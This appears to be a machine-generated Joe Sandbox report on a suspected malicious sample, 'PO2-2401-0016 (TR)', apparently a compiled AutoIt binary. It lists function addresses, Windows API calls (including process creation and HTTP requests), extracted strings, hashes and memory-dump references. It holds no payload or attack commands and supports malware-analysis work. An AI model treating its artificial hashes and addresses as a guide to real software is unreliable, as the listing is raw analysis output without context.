                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                • API String ID: 9721498-966354055
                                • Opcode ID: 2f290bb12c08c2e806238d75624f5fa35ea3c16422feadc3c4fd239d4b985492
                                • Instruction ID: d8912816042648fcee3af71ac8376a4ba1b1e875d11ed8f19c5a5d9af54deae1
                                • Opcode Fuzzy Hash: 2f290bb12c08c2e806238d75624f5fa35ea3c16422feadc3c4fd239d4b985492
                                • Instruction Fuzzy Hash: 6B125635604201DFCB14DF24D881A2AB7E5EF88725F04885DF89A9B3A2DB31ED45CB81
                                Function 001E091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                Download Yara Rule
                                APIs
                                • CharUpperBuffW.USER32(?,?), ref: 001E09C6
                                • _wcslen.LIBCMT ref: 001E0A01
                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001E0A54
                                • _wcslen.LIBCMT ref: 001E0A8A
                                • _wcslen.LIBCMT ref: 001E0B06
                                • _wcslen.LIBCMT ref: 001E0B81
                                  • Part of subcall function 0016F9F2: _wcslen.LIBCMT ref: 0016F9FD
                                  • Part of subcall function 001B2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001B2BFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                • API String ID: 1103490817-4258414348
                                • Opcode ID: 252e72f6885c459ff379819bee2d6aec2075036b8b5cc0b1313d4a0a2d875e10
                                • Instruction ID: 80427f7f087eb66a85ac83602308ddba293a2fa3b0ac98c233842aa4a15e79bb
                                • Opcode Fuzzy Hash: 252e72f6885c459ff379819bee2d6aec2075036b8b5cc0b1313d4a0a2d875e10
                                • Instruction Fuzzy Hash: E8E1CF35208781CFC715DF25C85086EB7E1BFA8318B15895DF8969B3A2D770ED89CB81
                                Function 001DC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$BuffCharUpper
                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                • API String ID: 1256254125-909552448
                                • Opcode ID: 20b88b47279353510ec4cf1d1d31a46b78242ebb47bf285d58f9a4c05d1fd41c
                                • Instruction ID: d6245dd430dde039f165571733629b2fe9eb1e58e217e3a2b12c72540eed256d
                                • Opcode Fuzzy Hash: 20b88b47279353510ec4cf1d1d31a46b78242ebb47bf285d58f9a4c05d1fd41c
                                • Instruction Fuzzy Hash: 7A71E23261016B8BCB20DE6CCD515BB33A5ABB4794B150A2AF8669B384F731CD95C3E0
                                Function 001E833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                Download Yara Rule
                                APIs
                                • _wcslen.LIBCMT ref: 001E835A
                                • _wcslen.LIBCMT ref: 001E836E
                                • _wcslen.LIBCMT ref: 001E8391
                                • _wcslen.LIBCMT ref: 001E83B4
                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001E83F2
                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,001E5BF2), ref: 001E844E
                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001E8487
                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001E84CA
                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001E8501
                                • FreeLibrary.KERNEL32(?), ref: 001E850D
                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001E851D
                                • DestroyIcon.USER32(?,?,?,?,?,001E5BF2), ref: 001E852C
                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 001E8549
                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 001E8555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                • String ID: .dll$.exe$.icl
                                • API String ID: 799131459-1154884017
                                • Opcode ID: e210cd6324be3034f49bcf58c00d27e57b901f29b9a9821d503ad88d9bf70393
                                • Instruction ID: fc55935db32132765dd03179264695d372ea9979399e8fb44e639ddb7af06e65
                                • Opcode Fuzzy Hash: e210cd6324be3034f49bcf58c00d27e57b901f29b9a9821d503ad88d9bf70393
                                • Instruction Fuzzy Hash: D961DD71500A55BBEB14DF65CC81BBE77A8FF18B11F104609F919EA0D1EF74A990CBA0
                                Function 00157778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                • API String ID: 0-1645009161
                                • Opcode ID: c42dcee2efd18199cd10c8f1a8066386f9289a3b45e58e05c66e6c67c36e00b9
                                • Instruction ID: 7247a3f6008b533b1c2e1aaa10308fff320aa1767db4cc3ed6eb313b38e1e8a2
                                • Opcode Fuzzy Hash: c42dcee2efd18199cd10c8f1a8066386f9289a3b45e58e05c66e6c67c36e00b9
                                • Instruction Fuzzy Hash: DC81F371640605EBDB25AF60EC47FAE37A9AF25301F144024FD18AF1D6EB70DA16C7A1
                                Function 001B5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • LoadIconW.USER32(00000063), ref: 001B5A2E
                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001B5A40
                                • SetWindowTextW.USER32(?,?), ref: 001B5A57
                                • GetDlgItem.USER32(?,000003EA), ref: 001B5A6C
                                • SetWindowTextW.USER32(00000000,?), ref: 001B5A72
                                • GetDlgItem.USER32(?,000003E9), ref: 001B5A82
                                • SetWindowTextW.USER32(00000000,?), ref: 001B5A88
                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 001B5AA9
                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 001B5AC3
                                • GetWindowRect.USER32(?,?), ref: 001B5ACC
                                • _wcslen.LIBCMT ref: 001B5B33
                                • SetWindowTextW.USER32(?,?), ref: 001B5B6F
                                • GetDesktopWindow.USER32 ref: 001B5B75
                                • GetWindowRect.USER32(00000000), ref: 001B5B7C
                                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 001B5BD3
                                • GetClientRect.USER32(?,?), ref: 001B5BE0
                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 001B5C05
                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 001B5C2F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                • String ID:
                                • API String ID: 895679908-0
                                • Opcode ID: e4da5687edfecad64d0ec3c3a4fa2d26272cdff695b096afeb86de434ca3f5a2
                                • Instruction ID: f1ac7fb0f1c883ce79a91c4ca64db9b0c92fe5a110eaac1490b8a1067f55c896
                                • Opcode Fuzzy Hash: e4da5687edfecad64d0ec3c3a4fa2d26272cdff695b096afeb86de434ca3f5a2
                                • Instruction Fuzzy Hash: 4E716D31900B09AFDB20DFA9CE85BAEBBF6FF48704F104518E542A76A0D775E945CB50
                                Function 001B30F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen
                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[!
                                • API String ID: 176396367-2891400992
                                • Opcode ID: c9babb239876d378d57653d0dd10fbcf10029a962191d244b7042387136036d1
                                • Instruction ID: 341570cc986afb8cc324ff6d4a9055ec64c6e8ee38ae2350151a07c70473d904
                                • Opcode Fuzzy Hash: c9babb239876d378d57653d0dd10fbcf10029a962191d244b7042387136036d1
                                • Instruction Fuzzy Hash: 5FE1F731A00526EBCB289F78C8416EEFBB4BF64714F558159E476E7240DB30AFA9C790
                                Function 001700C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                Download Yara Rule
                                APIs
                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001700C6
                                  • Part of subcall function 001700ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0022070C,00000FA0,ED7A0071,?,?,?,?,001923B3,000000FF), ref: 0017011C
                                  • Part of subcall function 001700ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001923B3,000000FF), ref: 00170127
                                  • Part of subcall function 001700ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001923B3,000000FF), ref: 00170138
                                  • Part of subcall function 001700ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0017014E
                                  • Part of subcall function 001700ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0017015C
                                  • Part of subcall function 001700ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0017016A
                                  • Part of subcall function 001700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00170195
                                  • Part of subcall function 001700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001701A0
                                • ___scrt_fastfail.LIBCMT ref: 001700E7
                                  • Part of subcall function 001700A3: __onexit.LIBCMT ref: 001700A9
                                Strings
                                • SleepConditionVariableCS, xrefs: 00170154
                                • kernel32.dll, xrefs: 00170133
                                • InitializeConditionVariable, xrefs: 00170148
                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00170122
                                • WakeAllConditionVariable, xrefs: 00170162
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                • API String ID: 66158676-1714406822
                                • Opcode ID: 3bbcb1bf2e22a07ec908ea673c29008e07f2816c6265658d8e00a029e88e7184
                                • Instruction ID: e356922bb1980496ccd717467a1baf5552c58520123243afcaa1d9daacac54b2
                                • Opcode Fuzzy Hash: 3bbcb1bf2e22a07ec908ea673c29008e07f2816c6265658d8e00a029e88e7184
                                • Instruction Fuzzy Hash: 9A21F932A44750EBD7226BE4BC89B6E77F4EB0DB61F01813DFC0596691DBB09C418A90
                                Function 001C44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                Download Yara Rule
                                APIs
                                • CharLowerBuffW.USER32(00000000,00000000,001ECC08), ref: 001C4527
                                • _wcslen.LIBCMT ref: 001C453B
                                • _wcslen.LIBCMT ref: 001C4599
                                • _wcslen.LIBCMT ref: 001C45F4
                                • _wcslen.LIBCMT ref: 001C463F
                                • _wcslen.LIBCMT ref: 001C46A7
                                  • Part of subcall function 0016F9F2: _wcslen.LIBCMT ref: 0016F9FD
                                • GetDriveTypeW.KERNEL32(?,00216BF0,00000061), ref: 001C4743
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$BuffCharDriveLowerType
                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                • API String ID: 2055661098-1000479233
                                • Opcode ID: 786217f83316d2d2488c395c19c9af77e7c26d07260b9c40ffb14c9e905a8aca
                                • Instruction ID: aed63cb13965299cfd2ff0b53bc85122b9afc9b19351049dc1e64fd06d21307e
                                • Opcode Fuzzy Hash: 786217f83316d2d2488c395c19c9af77e7c26d07260b9c40ffb14c9e905a8aca
                                • Instruction Fuzzy Hash: 58B1EE3160C3129FC724DF28C8A0E6EB7E5AFB5724F50491DF4A6C7291E730D989CA92
                                Function 001E911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00169BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00169BB2
                                • DragQueryPoint.SHELL32(?,?), ref: 001E9147
                                  • Part of subcall function 001E7674: ClientToScreen.USER32(?,?), ref: 001E769A
                                  • Part of subcall function 001E7674: GetWindowRect.USER32(?,?), ref: 001E7710
                                  • Part of subcall function 001E7674: PtInRect.USER32(?,?,001E8B89), ref: 001E7720
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 001E91B0
                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001E91BB
                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001E91DE
                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 001E9225
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 001E923E
                                • SendMessageW.USER32(?,000000B1,?,?), ref: 001E9255
                                • SendMessageW.USER32(?,000000B1,?,?), ref: 001E9277
                                • DragFinish.SHELL32(?), ref: 001E927E
                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 001E9371
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#"
                                • API String ID: 221274066-2770955705
                                • Opcode ID: a842275943251ea8e1eae865721eac10eb7c78a8ca96714ad7a0d06066b38838
                                • Instruction ID: 66afaa6a605685e56af0162986c42b66183c84e9430487698f711a4cc01eea3c
                                • Opcode Fuzzy Hash: a842275943251ea8e1eae865721eac10eb7c78a8ca96714ad7a0d06066b38838
                                • Instruction Fuzzy Hash: BA618A71108341AFC701DFA4DC85DAFBBE8EF99750F40091EF9A1961A1DB709A4ACB92
                                Function 001DAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                Download Yara Rule
                                APIs
                                • _wcslen.LIBCMT ref: 001DB198
                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001DB1B0
                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001DB1D4
                                • _wcslen.LIBCMT ref: 001DB200
                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001DB214
                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001DB236
                                • _wcslen.LIBCMT ref: 001DB332
                                  • Part of subcall function 001C05A7: GetStdHandle.KERNEL32(000000F6), ref: 001C05C6
                                • _wcslen.LIBCMT ref: 001DB34B
                                • _wcslen.LIBCMT ref: 001DB366
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001DB3B6
                                • GetLastError.KERNEL32(00000000), ref: 001DB407
                                • CloseHandle.KERNEL32(?), ref: 001DB439
                                • CloseHandle.KERNEL32(00000000), ref: 001DB44A
                                • CloseHandle.KERNEL32(00000000), ref: 001DB45C
                                • CloseHandle.KERNEL32(00000000), ref: 001DB46E
                                • CloseHandle.KERNEL32(?), ref: 001DB4E3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                • String ID:
                                • API String ID: 2178637699-0
                                • Opcode ID: bcd0bfebedb11c09046ff1eda8938e4197ba3e1339fc2dc14ef36ca9d9bde27a
                                • Instruction ID: 7f5e906cb782ac9c7ac8d13197de103f6d8500bbf66caaa21838b6687145cb3e
                                • Opcode Fuzzy Hash: bcd0bfebedb11c09046ff1eda8938e4197ba3e1339fc2dc14ef36ca9d9bde27a
                                • Instruction Fuzzy Hash: 8CF16731608340DFC714EF24D891A6EBBE1AF95314F15855EF89A8B3A2DB31EC45CB92
                                Function 0015326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetMenuItemCount.USER32(00221990), ref: 00192F8D
                                • GetMenuItemCount.USER32(00221990), ref: 0019303D
                                • GetCursorPos.USER32(?), ref: 00193081
                                • SetForegroundWindow.USER32(00000000), ref: 0019308A
                                • TrackPopupMenuEx.USER32(00221990,00000000,?,00000000,00000000,00000000), ref: 0019309D
                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001930A9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                • String ID: 0
                                • API String ID: 36266755-4108050209
                                • Opcode ID: 85a7c4504ba4286bb48374c7a11d557fe90473f3c288edde4ec3cf77dc7a1434
                                • Instruction ID: f82545977a383ce4f6b3b62799d1f15469a782a4ed6e4240c5ea91909b126c7f
                                • Opcode Fuzzy Hash: 85a7c4504ba4286bb48374c7a11d557fe90473f3c288edde4ec3cf77dc7a1434
                                • Instruction Fuzzy Hash: 65710470644205BEEF258F64CC89FAABF64FF05364F244216F939AA1E0C7B1A954DB90
                                Function 001E6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                Download Yara Rule
                                APIs
                                • DestroyWindow.USER32(?,?), ref: 001E6DEB
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 001E6E5F
                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001E6E81
                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001E6E94
                                • DestroyWindow.USER32(?), ref: 001E6EB5
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00150000,00000000), ref: 001E6EE4
                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001E6EFD
                                • GetDesktopWindow.USER32 ref: 001E6F16
                                • GetWindowRect.USER32(00000000), ref: 001E6F1D
                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001E6F35
                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 001E6F4D
                                  • Part of subcall function 00169944: GetWindowLongW.USER32(?,000000EB), ref: 00169952
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                • String ID: 0$tooltips_class32
                                • API String ID: 2429346358-3619404913
                                • Opcode ID: c1d002fefd6d54685eceda1c8ab1198487b4ae895c87943848e72e03d428e9cb
                                • Instruction ID: eb917520e619384ba7993f3df8a2800c38f0cdcf99eaf7480dad1bf9fb1fb6d5
                                • Opcode Fuzzy Hash: c1d002fefd6d54685eceda1c8ab1198487b4ae895c87943848e72e03d428e9cb
                                • Instruction Fuzzy Hash: 2B718870104684AFDB20CF59DC98EAABBE9FBA9340F84041DF999872A1C770AD46CB51
                                Function 001CC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                Download Yara Rule
                                APIs
                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001CC4B0
                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001CC4C3
                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001CC4D7
                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 001CC4F0
                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 001CC533
                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 001CC549
                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001CC554
                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001CC584
                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001CC5DC
                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001CC5F0
                                • InternetCloseHandle.WININET(00000000), ref: 001CC5FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
